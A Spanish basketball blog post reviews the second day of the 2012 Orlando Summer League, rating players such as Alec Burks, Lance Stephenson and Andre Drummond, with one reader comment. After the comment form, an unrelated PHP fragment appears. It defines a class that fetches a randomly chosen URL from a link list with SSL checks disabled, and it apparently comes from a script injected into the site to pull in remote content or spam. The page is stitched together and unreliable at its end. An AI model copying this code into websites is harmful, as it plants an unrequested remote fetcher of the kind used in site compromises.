Orlando Summer League: Día 2

11 de July de 2012 por txusma

Segundo día de ligas de verano con un protagonista por encima de todos: Alec Burks, el jugador de segundo año de los Utah Jazz, se fue a los 31 puntos. Lance Stephenson y Austin Daye fueron otros de los destacados del día.

Destacados

Alec Burks: Como ya hemos comentado, el escolta de los Jazz se fue a los 31 puntos con un 10 de 14 en tiro cimentado en un gran acierto en sus penetraciones a canastas. Además anotó en momentos importantes. Su gran actuación acentúa el debate sobre quién debe ser el escolta titular en Utah.

Lance Stephenson: Todos sabemos que “Born Ready” atesora un talento inmenso pero su mala cabeza le juega en muchas ocasiones malas pasadas. Cuando juega centrado se convierte en un jugador muy a tener en cuenta. Anoche lideró a los Pacers a su segunda victoria con 28 puntos y 7 asistencias.

Austin Daye: Si hay un jugador que destaca en las Summer Leagues ese es el jugador de los Pistons. Anoche anotó 8 de sus 10 intentos de canasta y se fue a los 24 puntos en 23 minutos. Lo que debería ser normal para alguien que ya lleva 3 temporadas en la NBA. 

A seguir

Enes Kanter: Se fue a los 10 puntos y 8 rebotes. No impresiona pero evoluciona favorablemente.

Miles Plumlee: Anotó 14 puntos pero se quedó en solo 3 rebotes, una cifra muy baja para una de las sorpresas del draft. Nadie le esperaba en primera ronda.

Perry Jones: Esta vez se quedó en 8 puntos, 4 rebotes y 3 tapones pero lo cierto es que los Thunder no jugaron para él en ningún momento y se dedicó a labores de intendencia.

Andrew Nicholson: Le costó defender a un Austin Daye que jugaba mucho por fuera y en ataque no estuvo tan clarividente como el día anterior. Acabó con 13 puntos y 6 rebotes.

Jared Sullinger: Salió de titular pero no tuvo un buen día de cara a canasta (8 puntos con un 3 de 12). De todas maneras cogió 12 rebotes, 4 en ataque.

Decepciones

Mo Harkless: La elección de los Sixers se tuvo que retirar a los 9 minutos de partido pero no nos dejó prácticamente nada, un par de puntos, 1 rebote y 1 asistencia.

Orlando Johnson: El compañero de Lance Stephenson en el juego exterior (escogido en 2ª ronda por los Kings y traspasado a los Pacers) falló los 10 tiros que intentó en 29 minutos. Al menos aportó 5 asistencias y 4 rebotes.

Andre Drummond: Se empiezan a confirmar los peores temores. El pívot de los Pistons se quedó en unos míseros 3 puntos y 3 rebotes. La indolencia que transmite es preocupante.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    otros dos que se estan ganado su lugar en la nba este año, son morrison y al thorthon, ambos jugando realmente buenos partidos en los nets que necesitan jugadores por el minimo

    drummond lo dije ayer, que feo que se ve en la cancha, me recuerda por momento a thebbet, vuelca bien el balon es cierto, pero creo que no entiende mucho el juego

    sullinger abusando de sus rivales, esta claro que esta por ensima de los niños que juegan este torneo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>